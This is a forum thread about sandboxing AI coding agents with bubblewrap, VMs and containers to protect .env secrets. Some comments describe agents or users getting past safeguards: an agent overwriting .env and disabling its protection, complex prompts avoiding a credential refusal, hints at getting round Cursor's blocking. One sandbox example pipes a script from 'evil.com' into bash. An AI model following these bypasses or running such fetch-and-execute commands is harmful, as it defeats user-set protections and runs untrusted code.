Bubblewrap: A nimble way to prevent agents from accessing your .env files

(patrickmccanna.net)

187 points · 0o_MrPatrick_o0 · 5mo ago · 140 comments

100 comments · 35 top-level

bjackman5mo ago· 16 in thread

I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:

- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).

- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).

I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here, seems you always get the worst of both worlds if you do that.

Maybe the usecase for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaving a secret that's in context? So it's not that it's a 'mixed' usecase but rather it's just increasing safety in the supervised case?

emilburzo5mo ago

> unsupervised in a VM in the cloud where the agent has root

Why in the cloud and not in a local VM?

I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.

https://blog.emilburzo.com/2026/01/running-claude-code-dange...

avtar5mo ago

It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:

> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.

The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.

1 more reply

benterix5mo ago

Depends on what you do. If you need to have a fully working site with external integrations, SSL and so on, it's just easier to spend $4 a month on a VPS. But you're right, for many backend-based projects a local VM like multipass or a kind/microk8s cluster are perfectly fine.

ahmadyan5mo ago

You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to first copy the code with git-worktree, then share that with the container.
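
A minimal sketch of the worktree approach described above, assuming a POSIX-like shell and a git version that supports `git worktree`. The helper name `make_agent_worktree` and the branch name `agent-scratch` are hypothetical, chosen for illustration; nothing here is taken from agentastic.dev.

```shell
# Sketch: hand the agent a disposable checkout instead of the real working tree.
# make_agent_worktree is a hypothetical helper, not part of git or any agent tool.
make_agent_worktree() {
  local repo="$1" dest="$2" branch="${3:-agent-scratch}"
  # Create a new branch from HEAD and check it out into a separate directory.
  git -C "$repo" worktree add -b "$branch" "$dest" >/dev/null
}

# Usage (paths are placeholders):
#   make_agent_worktree ~/code/myproject /tmp/myproject-agent
#   ...then mount /tmp/myproject-agent into the container or sandbox.
```

One caveat: in a linked worktree, `.git` is a file that points back into the original repository's `.git` directory, so git commands inside the container only work if that directory is reachable there too.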

bjackman5mo ago

Yeah local is totally fine too just whatever is easiest to set up.

Bender5mo ago

As someone that does this, it's Turtles All The Way Down [1]. Every layer has escapes. I require people to climb up multiple turtles thus breaking most skiddie [2] scripts. Attacks will have to be targeted and custom crafted by people that can actually code thus reducing the amount of turds in the swimming pool I must avoid. People should not write apps that make assumptions around accessing sensitive files.

[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down

[2] - https://en.wikipedia.org/wiki/Skiddies

bjackman5mo ago

It's turtles all the way down but there is a VERY big gap between VM Isolation Turtle and <a half-arse seccomp policy> turtle. It's a qualitative difference between those two sandboxes.

(If the VM is remote, even more so).

theptip5mo ago

It’s a risk/convenience tradeoff. The biggest threat is that Claude accidentally accesses and leaks your SSL keys, or gets prompt-hijacked into doing the same. A simple sandbox fixes this.

There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.

bjackman5mo ago

How does a simple sandbox fix this at all? If Claude has been prompt-hijacked you need a VM to be anywhere near safe.

1 more reply

sschueller5mo ago

Is there a premade VM image or docker container I can just start with for example Google Antigravity, Claude or Kilocode/vscode? Right now I have to install some linux desktop and all the tools needed, a bit of a pain IMO.

I see there are cloud VMs like at kilocode but they are kind of useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud.

bjackman5mo ago

I use https://jules.google.

The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.

This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.

I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.

roywiggins5mo ago

Locally, I'd use Vagrant with a provisioning script that installs whatever you need on top of one of the prebuilt Vagrant boxes. You can then snapshot that if you want and turn that into a base image for subsequent containers.

emilburzo5mo ago

> [...] and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud

Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.

wasting_time5mo ago

fly.io launched something like that recently:

https://sprites.dev/

arcanemachiner5mo ago

Just got started with Claude Code the other day, using the dev container CLI. It's super easy.

TLDR:

- Ensure that you have installed npm on your machine.

- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`

- Clone the Claude Code repo: https://github.com/anthropics/claude-code

- Navigate into the root directory of that repo.

- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`

- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`

And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)

I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.

1 more reply

dizhn5mo ago

I was using opencode the other day. It took me a while to realize that the agent couldn't read/write the .env file but didn't realize it. When I pushed it, it was first able to create a temp file and copy it over .env AND write an opencode.json file that disables the .env protection and go wild.

aszen5mo ago· 8 in thread

I wonder why we are even storing secrets in .env files in plain text

makoto125mo ago

This wouldn't have made the front page if it was: "How to not store your secrets in plain text"

patapong5mo ago

I would also prefer not doing this. Does anyone know of any lightweight, cross platform alternatives?

geoffeg5mo ago

I use sops and age, originally loosely based on this article: https://devops.datenkollektiv.de/using-sops-with-age-and-git...

I originally set up the git filters, but later disabled them.

phrotoma5mo ago

Perhaps I'm off base here but it seems like the goal is:

1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.

2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.

If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.

Very interested in being wrong about this. Please correct me!

2 more replies

eddd-ddde5mo ago

https://www.passwordstore.org/

You can easily script it to decode passwords on demand.

WhyNotHugo5mo ago

If your .env file is being sourced by something like direnv, you can have it read secrets from the secret storage service and export them as env vars.

If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.
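
A rough sketch of that idea: the file in the project directory holds only the command that fetches a secret, never the secret itself. `load_secret` is a hypothetical helper, and the `pass` entry name in the comment is made up for illustration; direnv itself is not required to try it.

```shell
# Sketch of an .envrc-style loader. load_secret is a hypothetical helper.
load_secret() {
  local name="$1"
  shift
  local value
  # Run the fetch command; export nothing if it fails (for example, inside a
  # sandbox that cannot reach the secret store).
  if ! value="$("$@")"; then
    echo "load_secret: could not fetch $name" >&2
    return 1
  fi
  export "$name=$value"
}

# Example .envrc line (assumes the `pass` password manager and a made-up entry):
#   load_secret API_TOKEN pass show myproject/api-token
```

Inside a sandbox that bind-mounts the project, the agent can read this file and see the command, but running it fails as long as the password store and its keys are not mounted as well.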

aszen5mo ago

https://devenv.sh/integrations/secretspec/

johnisgood5mo ago

I would like an answer, too.

theden5mo ago· 8 in thread

Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of halting from using `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad

simonw5mo ago

Because we've judged it to be worth it!

YOLO mode is so much more useful that it feels like using a different product.

If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.

zahlman5mo ago

Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?

5 more replies

pjm3315mo ago

I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.

1 more reply

catlifeonmars5mo ago

Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?

croes5mo ago

> Because we've judged it to be worth it!

Famous last words

catlifeonmars5mo ago

People really really want to juggle chainsaws, so have to keep coming up with thicker and thicker gloves.

solumunus5mo ago

The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.

1 more reply

staticassertion5mo ago

Just like every package manager already does? This issue predates LLMs and people have never cared enough to pressure dev tooling into caring. LLMs have seemingly created a world where people are finally trying to solve the long existing "oh shit there's code execution everywhere in my dev environment where I have insane levels of access to prod etc" problem.

raphinou5mo ago· 5 in thread

I put all my agents in a docker file in which the code I'm working on is mounted. It's working perfectly for me until now. I even set it up so I can run gui apps like antigravity in it (X11). If anyone is interested I shared my setup at https://github.com/asfaload/agents_container

grewil25mo ago

It won’t save you from prompt injections that attack your network.

TCattd5mo ago

Shameless plug, in case you're interested: https://github.com/EstebanForge/construct-cli

Let me know if you give it a go ;)

1 more reply

fgonzag5mo ago

In theory the docker container should only have the projects directory mounted, open access to the internet, and that's it. No access to anything else on the host or the local network.

Internet to connect with the provider, install packages, and search.

It's not perfect but it's a start.

63stack5mo ago

Docker containers run in their separate isolated network

2 more replies

raphinou5mo ago

of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!

simonw5mo ago· 3 in thread

I recommend caution with this bit:

  --bind "$HOME/.claude" "$HOME/.claude"

That directory has a bunch of sensitive stuff in it, most notably the transcripts of all of your previous Claude Code sessions.

You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.

0o_MrPatrick_o0OP5mo ago

Heya- The reason I add this directory is because Claude needs read/write permissions for getting new auth tokens.

Without this, you'll have to re-login to Claude every time. Breaks the speed of development.

I'm going to do some experimenting to see if I can make this bind more precise.

pmontra5mo ago

I think that the rw directories should not be shared among projects. Maybe there should be separate copies even for what gets mounted into $HOME/.nvm

0o_MrPatrick_o0OP5mo ago

Wonderful insight! Thank you!

meander_water5mo ago· 3 in thread

I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:

> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.

So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.

0o_MrPatrick_o0OP5mo ago

If your prompt is complex enough, it doesn’t seem to get triggered.

I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.

Kinda bums me out that there may be circumstances where the model just rejects this even if for some reason you needed it.

mmis10005mo ago

It seems to depend on the model and context usage though; the agent forgets a lot of things once the context is about half full. It even forgets the primary target you gave it at the start of the chat.

bavell5mo ago

Claude definitely has some API token security baked in, it saw some API keys in a log file of mine the other day and called them out to me as a security issue very clearly. In this case it was a false positive but it handled the situation well and even gave links to reset each token.

typs5mo ago· 3 in thread

I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!

verdverm5mo ago

Like this? (Obfuscated, from agent and history)

https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n

GrowingSideways5mo ago

If you wouldn't upload keys to github, why would you trust them to cursor?

hahahahhaah5mo ago

A local .env should be safe to put on your T-shirt and walk down Times Square.

Mysql user: test

Password: mypass123

Host: localhost

...

2 more replies

zaptheimpaler5mo ago· 3 in thread

I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?

kondu5mo ago

Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.

curt155mo ago

The common wisdom used to be that containers are not a security boundary. Is that still the case?

AlexCoventry5mo ago

I don't think bubblewrap is any better in that regard.

2 more replies

aurareturn5mo ago· 3 in thread

How do you prevent an agent from simply running console.log(process.env.SUPER_SECRET) and then looking at the log?

0o_MrPatrick_o0OP5mo ago

Great question! You might enjoy this writeup, which in one section explores avoiding the use of shell variables that are not exported as a method of mitigating this risk.

https://linus.schreibt.jetzt/posts/shell-secrets.html
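
A small illustration of the exported versus non-exported distinction, as a sketch only. The variable name is borrowed from the question above. This limits what a child process such as an agent inherits from your shell; it does not stop code that is deliberately given the secret from printing it.

```shell
# A plain assignment stays in the current shell; only `export` copies a
# variable into the environment of child processes.
unset SUPER_SECRET
SUPER_SECRET='not-exported'   # shell variable only, not in the environment

# A child process started from this shell does not see it.
child_view="$(sh -c 'printf "%s" "${SUPER_SECRET:-<unset>}"')"
echo "child sees: $child_view"              # prints: child sees: <unset>

# Hand it to exactly one command that needs it, without exporting it shell-wide.
one_shot="$(SUPER_SECRET="$SUPER_SECRET" sh -c 'printf "%s" "$SUPER_SECRET"')"
echo "one-shot child sees: $one_shot"       # prints: one-shot child sees: not-exported
```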

progx5mo ago

Your app runs in the app context, which is not accessible to an AI.

aurareturn5mo ago

You don't let your agent look at logs? How can it debug?

prmoustache5mo ago· 2 in thread

Isn't landrun the preferred way to sandbox apps on linux these days instead?

https://github.com/Zouuup/landrun

qrobit5mo ago

Bubblewrap seems to be much more popular [1]; personally, this is the first time I've heard about landrun

[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information

dividuum5mo ago

bubblewrap is a lot more flexible: You can freely piece together the sandboxed filesystem environment from existing directories, tmpfs, files or data provided via a file descriptor. landrun, from what I understand only restricts what already exists. What is neat with landrun is the TCP port restrictions. This isn't possible with bubblewrap at the moment, although nothing really prevents bubblewrap from adding landlock support for those cases.

hahahahhaah5mo ago· 2 in thread

Had this same idea in my head. Glad someone has done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesn't matter.

JCattheATM5mo ago

So, Flatpak?

Funny enough Bubblewrap is also what Flatpak uses.

Imustaskforhelp5mo ago

I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker

rcarmo5mo ago· 2 in thread

I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”

grewil25mo ago

Docker won’t save you from prompt injections that attack your network.

rcarmo5mo ago

No kidding? https://taoofmac.com/space/blog/2026/01/12/1830

Still, I don’t think bubblewrap is either a simple or safe enough solution.

dangoodmanUT5mo ago· 1 in thread

I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about

catlifeonmars5mo ago

> run agents on systems i care about

You must not care about those systems that much.

globular-toast5mo ago· 1 in thread

Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/

Recently got it working for OpenCode and updated my post.

Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.

You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.

0o_MrPatrick_o0OP5mo ago

Hey man- sorry for the lack of recognition. Timing is a bit of luck. Good writeup!

w/r/t .git being mounted read write- yeah, there's risk here. It's a tradeoff. I want my agents to be able to commit code- which means they need to be able to write to the dir.

Thanks for the --new-session parameter suggestion. Great add!

nextaccountic5mo ago· 1 in thread

How does this compare with container-use?

https://container-use.com/introduction

domh5mo ago

This is exactly what I want, but don't really want to run Docker all the time. Nicer git worktrees and isolation of code so I can run multiple agents. It even has the setup command stuff so "npm install" runs automatically.

I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.

I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.

LazarSRB5mo ago· 1 in thread

dotenvx solves this by encrypting your .env file so you can even commit it safely

0o_MrPatrick_o0OP5mo ago

Amazing tip! Thank you!

gexla5mo ago· 1 in thread

I believe this is also what Claude Code uses for the sandbox option.

0o_MrPatrick_o0OP5mo ago

Hi!

Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.

They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.

That’s helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.

Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.

I hope others share the desire for consistent access controls across all agents. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.

gausswho5mo ago· 1 in thread

I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?

l725mo ago

This is what I have been using with opencode:

  exec bwrap \
    --unshare-pid \
    --unshare-ipc \
    --unshare-uts \
    --share-net \
    --bind "$OPENCODE_ROOT" "$OPENCODE_ROOT" \
    --bind "$CURRENT_DIR" "$CURRENT_DIR" \
    --bind "$HOME/.config/opencode/" "$HOME/.config/opencode/" \
    --bind "$HOME/.emacs" "$HOME/.emacs" \
    --bind "$HOME/.emacs.d" "$HOME/.emacs.d" \
    --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
    --ro-bind /bin /bin \
    --ro-bind /etc /etc \
    --ro-bind /lib /lib \
    --ro-bind /lib64 /lib64 \
    --ro-bind /usr /usr \
    --bind /run/systemd /run/systemd \
    --tmpfs /tmp \
    --proc /proc \
    --dev /dev \
    --setenv EDITOR emacs \
    --setenv PATH "$OPENCODE_BINDIR:/usr/bin:/bin" \
    --setenv HOME "$HOME" \
    -- \
    "opencode" "$@"

arresin5mo ago· 1 in thread

Why not just use a hook on reads?

0o_MrPatrick_o0OP5mo ago

because you're trusting Claude's implementation of hooks, which may be disastrous if they have a defect.

flakes5mo ago

I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.

With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.

  bwrap --ro-bind image/ / --bind src/ /src ...

Any tools you need in the container are installed in the image you unpack.

Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
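
The tips above can be collected into one argument list. This is a sketch under assumptions: `build_bwrap_args` is a hypothetical helper, the unpacked image is assumed to already contain `/proc`, `/dev`, `/tmp` and `/src` directories to mount onto, and `--new-session` comes from a suggestion elsewhere in this thread rather than from the comment above.

```shell
# Sketch: print a bwrap argument list, one argument per line.
# build_bwrap_args is a hypothetical helper; image_dir is the unpacked image
# and src_dir is the only host directory exposed read/write.
build_bwrap_args() {
  local image_dir="$1" src_dir="$2"
  printf '%s\n' \
    --unshare-all \
    --share-net \
    --cap-drop ALL \
    --new-session \
    --ro-bind "$image_dir" / \
    --bind "$src_dir" /src \
    --proc /proc \
    --dev /dev \
    --tmpfs /tmp
}

# Usage in bash (not run here; paths must not contain newlines):
#   mapfile -t args < <(build_bwrap_args "$PWD/image" "$PWD/src")
#   bwrap "${args[@]}" -- /bin/sh
```

Mount order matters: the read-only root comes first, and the writable `/src`, `/proc`, `/dev` and `/tmp` are layered on top of it.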

brendoncarroll5mo ago

I also wrote a tool for doing this[0], after one of these agents edited a config file outside of the repo it was supposed to work within. I only realized the edit because I have my dotfiles symlinked to a git repository, and git status showed it when I was committing another change. It's likely that the agents are making changes that I (and others) are not aware of because there is no easy way to detect them.

The approach I started taking is mounting the directory, that I want the agent to work on, into a container. I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to. I also mount any config it might need as read-only.

The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout. I want a tool for managing agents, and I want each agent to be its own process, in its own container. But just locking up the whole mess seems to work for now.

I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer to them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.

[0] https://github.com/brendoncarroll/nnc

Gerharddc5mo ago

Great writeup! An alternative I have explored (more for defense against supply-chain attacks than for agents admittedly) is to use rootless Podman to get a dev-container-like experience alongside sandboxing. To this end I have built https://github.com/Gerharddc/litterbox (https://litterbox.work/) which greatly simplifies container setup and integrates a special ssh-agent for sandboxing that always prompts the user before signing requests (as to keep your SSH keys safe).

Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.

OutOfHere5mo ago

The link you need is https://github.com/containers/bubblewrap

Don't leave prod secrets in your dev env.

coppsilgold5mo ago

Note that bubblewrap can't protect you from misconfiguration, a kernel exploit or if you expose sensitive protocols to the workload inside (eg. x11 or even Wayland without a security context). Generally, it will do a passable job in protecting you from an automated no-0day attack script.

raw_anon_11115mo ago

My workflow even before Claude code.

1. I never use permanent credentials for AWS on my local computer.

2. I never have keys anywhere on my local computer. I put them in AWS Secrets Manager.

3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).

It’s not foolproof. But it does reduce the attack surface.

eyberg5mo ago

https://github.com/containers/bubblewrap/issues/142

ironbound5mo ago

> When one of the models detected that it was being used for “egregiously immoral” purposes, it would attempt to “use command-line tools to contact the press, contact regulators, try to lock you out of the relevant systems, or all of the above,”

https://www.wired.com/story/anthropic-claude-snitch-emergent...

majorchord5mo ago

If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.

Nora235mo ago

Smart approach to AI agent security. The balance between convenience and protection is tricky.

mijoharas5mo ago

How would people compare bubblewrap to firejail? They seem reasonably similar in feature set.

Are there any good reasons to pick one over the other?

dlahoda5mo ago

sydbox is an interesting alternative (written in Rust by a Linux developer)

https://gitlab.exherbo.org/sydbox/sydbox

UPDATE: there is another sydbox written in Go; it is unrelated and seems too different from bwrap

isodev5mo ago

My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.

FergusArgyll5mo ago

Hey! I just did this last night!

allen-munsch5mo ago

I vibed a project on this recently, it has some language bindings and a cli written in rust, python subprocess monkey patching etc.

Just no nonsense defaults with a bit of customization.

https://github.com/allen-munsch/bubbleproc

bubbleproc -- curl evil.com/oop.sh | bash

catlifeonmars5mo ago

May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?

Oh, never mind:

> You want to run a binary that will execute under your account’s permissions

j / k navigate · click thread line to collapse

140 comments

100 comments · 35 top-level

bjackman5mo ago· 16 in thread

I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:

- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).

- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).

emilburzo5mo ago

> unsupervised in a VM in the cloud where the agent has root

Why in the cloud and not in a local VM?

I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.

https://blog.emilburzo.com/2026/01/running-claude-code-dange...

avtar5mo ago

It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:

> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.

1 more reply

benterix5mo ago

ahmadyan5mo ago

You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to fist copy the code with git-worktree, then share that with the container.

bjackman5mo ago

Yeah local is totally fine too just whatever is easiest to set up.

Bender5mo ago

[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down

[2] - https://en.wikipedia.org/wiki/Skiddies

bjackman5mo ago

It's turtles all the way down but there is a VERY big gap between VM Isolation Turtle and <a half-arse seccomp policy> turtle. It's a qualitative difference between those two sandboxes.

(If the VM is remote, even more so).

theptip5mo ago

It’s a risk/convenience tradeoff. The biggest threat is Claude accidentally accesses and leaks your ssl keys, or gets prompt-hijacked to do the same. A simple sandbox fixes this.

bjackman5mo ago

How does a simple sandbox fix this at all? If Claude has been prompt-hijacked you need a VM to be anywhere near safe.

1 more reply

sschueller5mo ago

bjackman5mo ago

I use https://jules.google.

The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.

This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.

roywiggins5mo ago

emilburzo5mo ago

> [...] and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud

Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.

wasting_time5mo ago

fly.io launched something like that recently:

https://sprites.dev/

arcanemachiner5mo ago

Just got started with Claude Code the other day, using the dev container CLI. It's super easy.

TLDR:

- Ensure that you have installed npm on your machine.

- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`

- Clone the Claude Code repo: https://github.com/anthropics/claude-code

- Navigate into the root directory of that repo.

- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`

- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`

And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)

dizhn5mo ago

aszen5mo ago· 8 in thread

I wonder why we are even storing secrets in .env files in plain text

makoto125mo ago

This wouldn't have made the front page if it was: "How to not store your secrets in plain text"

patapong5mo ago

I would also prefer not doing this. Does anyone know of any lightweight, cross platform alternatives?

geoffeg5mo ago

I use sops and age, originally loosely based on this article: https://devops.datenkollektiv.de/using-sops-with-age-and-git...

I originally set up the git filters, but later disabled them.

phrotoma5mo ago

Perhaps I'm off base here but it seems like the goal is:

1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.

2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.

Very interested in being wrong about this. Please correct me!

eddd-ddde5mo ago

https://www.passwordstore.org/

You can easily script it to decode passwords on demand.
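
As a minimal sketch of what "decode on demand" could look like, the wrapper below hands a secret to one command instead of keeping it in a plain-text .env file. `pass show` is the real password-store command; the function name `with_secret`, the entry `myproject/api-key`, and the variable `API_KEY` are hypothetical placeholders.

```shell
# Hypothetical helper: run one command with a secret pulled from pass.
# Usage: with_secret <pass-entry> <ENV_VAR_NAME> <command> [args...]
# The body runs in a subshell, so nothing leaks into the calling shell.
with_secret() (
  entry="$1"; var="$2"; shift 2
  # Stop if the entry cannot be decrypted.
  raw="$(pass show "$entry")" || exit 1
  # By pass convention the first line of an entry is the password.
  secret="$(printf '%s\n' "$raw" | head -n 1)"
  # Export inside the subshell only, then run the requested command.
  export "$var=$secret"
  "$@"
)

# Example (assumed entry name):
#   with_secret myproject/api-key API_KEY ./deploy.sh
```

This only keeps the plain text off disk. Anything that can call the wrapper, or read the environment of the command it starts, can still reach the secret.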

WhyNotHugo5mo ago

If your .env file is being sourced by something like direnv, you can have it read secrets from the secret storage service and export them as env vars.

If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.

aszen5mo ago

https://devenv.sh/integrations/secretspec/

johnisgood5mo ago

I would like an answer, too.

theden5mo ago· 8 in thread

simonw5mo ago

Because we've judged it to be worth it!

YOLO mode is so much more useful that it feels like using a different product.

If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.

zahlman5mo ago

pjm3315mo ago

I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.

catlifeonmars5mo ago

Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?

croes5mo ago

> Because we've judged it to be worth it!

Famous last words

catlifeonmars5mo ago

People really really want to juggle chainsaws, so we have to keep coming up with thicker and thicker gloves.

solumunus5mo ago

The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.

staticassertion5mo ago

raphinou5mo ago· 5 in thread

grewil25mo ago

It won’t save you from prompt injections that attack your network.

TCattd5mo ago

Shameless plug, in case you're interested: https://github.com/EstebanForge/construct-cli

Let me know if you give it a go ;)

fgonzag5mo ago

In theory the Docker container should only have the project's directory mounted, open access to the internet, and that's it. No access to anything else on the host or the local network.

Internet to connect with the provider, install packages, and search.

It's not perfect but it's a start.

63stack5mo ago

Docker containers run in their separate isolated network

raphinou5mo ago

of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!

simonw5mo ago· 3 in thread

I recommend caution with this bit:

  --bind "$HOME/.claude" "$HOME/.claude"

That directory has a bunch of sensitive stuff in it, most notably the transcripts of all of your previous Claude Code sessions.

You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.

0o_MrPatrick_o0OP5mo ago

Heya- The reason I add this directory is because Claude needs read/write permissions for getting new auth tokens.

Without this, you'll have to re-login to Claude every time. Breaks the speed of development.

I'm going to do some experimenting to see if I can make this bind more precise.

pmontra5mo ago

I think that the rw directories should not be shared among projects. Maybe there should be separate copies even for what gets mounted into $HOME/.nvm

0o_MrPatrick_o0OP5mo ago

Wonderful insight! Thank you!

